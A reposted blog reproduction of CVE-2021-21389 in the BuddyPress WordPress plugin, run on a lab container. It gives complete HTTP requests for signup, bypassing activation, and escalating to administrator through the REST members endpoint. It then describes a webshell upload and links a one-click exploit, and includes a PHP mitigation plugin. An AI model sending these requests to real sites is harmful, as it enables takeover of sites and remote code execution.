WordPress BuddyPress Privilege Escalation to RCE (CVE-2021-21389)

I. Vulnerability description

BuddyPress is an open source WordPress plugin for building community sites. In BuddyPress releases from 5.0.0 up to but not including 7.2.1, a non-privileged regular user can obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability was fixed in BuddyPress 7.2.1; existing installations of the plugin should be updated to this version to mitigate the issue.

II. Affected versions

5.0.0 <= BuddyPress < 7.2.1

III. Reproduction

PS: this reproduction uses the image vulfocus/wordpress_cve-2021-21389:latest.

0x01 Method one

  • Build the signup payload:

```http
POST //wp-json/buddypress/v1/signup HTTP/1.1
Host: ****:47613
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: python-requests/2.24.0
Accept: */*
Content-Type: application/json; charset=UTF-8
Content-Length: 109

{"user_login": "test1121", "user_email": "[email protected]", "user_name": "test1121", "password": "test1121"}
```

  • Take the activation_key returned by the signup request and send the following request to bypass email verification:

```http
PUT //wp-json/buddypress/v1/signup/activate/ysQdW3ClM7UFXILKo6fY6HvsmvyPvKcn HTTP/1.1
Host: ****:42678
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: python-requests/2.24.0
Accept: */*
Content-Type: application/json; charset=UTF-8
Content-Length: 109

{"user_login": "test1121", "user_email": "[email protected]", "user_name": "test1121", "password": "test1121"}
```

  • Create a new group: fill in the Details step, leave the Settings step at its defaults and click Next, then go back to Groups; the group has been created. http://******/groups/create/step/group-details/

  • Open the group "test", go to Manage > Members, click Ban, and capture the request to obtain a valid Cookie and X-WP-Nonce. Then build the request below, substitute that Cookie and X-WP-Nonce, and send it to obtain the administrator role.

  • POST /wp-json/buddypress/v1/members/me

  • Record the X-WP-Nonce: and Cookie: headers from the captured request.

  • Replace the X-WP-Nonce: and Cookie: values below and replay:

```http
POST /wp-json/buddypress/v1/members/me HTTP/1.1
Host: ****:12607
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-WP-Nonce: e35e0de589
Content-Type: application/json; charset=UTF-8
Cookie: csrf_ab39a3=1ecdf739; csrf_8c4f79=b156b1be; csrf_957c5a=cface2f8; csrf_6b71bf=6c0e9317; csrf_8e5be2=89cebc1e; csrf_c5ff2a=dd558828; _ga=GA1.1.1188675309.1720941309; _ga_J1DQF09WZC=GS1.1.1720941333.1.0.1720941333.0.0.0; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_489344b85a8c7a5a56c84c4b6b5258dd=test1121%7C1721219647%7CRG5qc0NcljSkQwceqH1MdCki9vpKAEqaED5O5ses7g9%7C47378454df210bfc2305a11338a597a5a16ab80fe6effc26f5459f2c22d0f453; wp-settings-time-2=1721047705; wordpress_logged_in_765816418d916bdda113ab20c6c87ff6=test1121%7C1721221157%7CCH5do9vqj1ubaMm5iO2xgNa7hGYExgWkyNg1ie4Z6TU%7C5863b7b1265ffa32919477bb24d7f6626fda17483c11838fb603b5593e1a9cee
Content-Length: 26

{"roles": "administrator"}
```

  • After refreshing the page the account has the administrator role and can view and operate every module. With administrator rights, the plugin update function is used to upload a shell.

  • Capture the upload request and change the file extension.

    ![](https://i-blog.csdnimg.cn/direct/e8bd3f7c21aa4f23ade914ea1598b095.png)
    
  • The uploaded file is then reachable under the wp-content/uploads/2024/07/ path (year/month of the upload).
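The escalation in method one rides on a single `roles` parameter sent to the members endpoint. As an added example (my own code, not the page's and not BuddyPress's actual 7.2.1 fix), the must-use plugin below rejects that parameter for any account lacking the `promote_users` capability, as an interim virtual patch for installations that cannot update immediately. The route regex and the choice of the `rest_request_before_callbacks` filter are my assumptions.

```php
<?php
/**
 * Plugin Name: Block unprivileged role changes via BuddyPress REST API
 * Description: Interim mitigation for CVE-2021-21389; remove after updating to BuddyPress >= 7.2.1.
 * Install as wp-content/mu-plugins/bp-block-role-change.php (path is an assumption for this example).
 */

// Runs after REST authentication but before the route callback; returning a WP_Error aborts the request.
add_filter( 'rest_request_before_callbacks', function ( $response, $handler, $request ) {
    // Assumed route pattern: /buddypress/v1/members/me and /buddypress/v1/members/<id>
    // (get_route() returns the path without the /wp-json prefix).
    $route = $request->get_route();
    if ( ! preg_match( '#^/buddypress/v1/members/(me|\d+)$#', $route ) ) {
        return $response;
    }

    // A role change is only legitimate from an account allowed to promote users.
    $roles = $request->get_param( 'roles' );
    if ( null !== $roles && '' !== $roles && ! current_user_can( 'promote_users' ) ) {
        // Leave an audit trail so attempts can be picked up from the PHP error log.
        error_log( sprintf(
            'CVE-2021-21389 mitigation: blocked role change to "%s" on %s by user %d from %s',
            is_array( $roles ) ? implode( ',', $roles ) : (string) $roles,
            $route,
            get_current_user_id(),
            $_SERVER['REMOTE_ADDR'] ?? 'unknown'
        ) );
        return new WP_Error(
            'rest_cannot_change_roles',
            __( 'Sorry, you are not allowed to change user roles.' ),
            array( 'status' => rest_authorization_required_code() )
        );
    }

    return $response;
}, 10, 3 );
```

With this in place, the `{"roles": "administrator"}` request from the reproduction returns a 401/403 error for the low-privileged account instead of succeeding; the real fix remains updating the plugin to 7.2.1 or later.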

0x02 Method two

  • Use the exploit written by HoangKien1020 to upload a shell in one step: GitHub - HoangKien1020/CVE-2021-21389, https://github.com/HoangKien1020/CVE-2021-21389

     ![](https://i-blog.csdnimg.cn/direct/51c6c4f8c49941ff89fd961e5b1f22d9.png)
       ![](https://i-blog.csdnimg.cn/direct/49f4879e71384399b00597b0713e8703.png)
       ![](https://i-blog.csdnimg.cn/direct/04ab595fb9f2495b88a129e7c27a118f.png)
    
Tags: security

Reposted from: https://blog.csdn.net/Biu_Biu_Bi/article/details/140450182
Copyright belongs to the original author 張童學; in case of infringement, please contact us for removal.
